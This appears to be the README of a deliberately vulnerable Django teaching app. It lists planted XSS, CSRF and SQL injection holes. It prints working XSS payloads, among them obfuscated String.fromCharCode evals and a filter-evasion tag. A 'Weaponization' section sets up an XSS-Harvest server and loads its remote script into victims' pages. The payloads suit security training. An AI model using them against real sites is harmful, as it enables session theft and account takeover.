Exploitable
A Django application full of security holes for instructional purposes.
Cross Site Scripting (XSS)
In the 'Branch Finder', there is a reflective XSS, and in the profile page, there is a persistant XSS.
Reflective
"){}; }; alert("jello"); //
Persistant
<scrscriptipt>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 39, 115, 109, 101, 108, 108, 111, 39, 41, 59))</scrscriptipt>
Resources
- https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
- http://ha.ckers.org/xsscalc.html
- http://jdstiles.com/java/cct.html
Cross Site Resource Forgery (CSRF)
Transfering Funds can be done as CSRF-unprotected GET request.
SQL Injection (SQLi)
Depositing funds can be used to deliver an SQL injection.
Resources
Weaponization
First, install XSS-Harvest: https://github.com/Miserlou/XSS-Harvest
Start Harvest Server
./xss-harvest.pl -l -p 9000 -r http://localhost:8000/accounts/signin/
Deliver Exploit Payload
<script src="http://localhost:9000/i"></script>
JavaScript Payload Delivery (with jQuery)
$.getScript("http://localhost:9000/i", function(){});
Char Encoded Payload Delivery
<script>eval(String.fromCharCode(36, 46, 103, 101, 116, 83, 99, 114, 105, 112, 116, 40, 34, 104, 116, 116, 112, 58, 47, 47, 108, 111, 99, 97, 108, 104, 111, 115, 116, 58, 57, 48, 48, 48, 47, 105, 34, 44, 32, 102, 117, 110, 99, 116, 105, 111, 110, 40, 41, 123, 125, 41, 59));</script>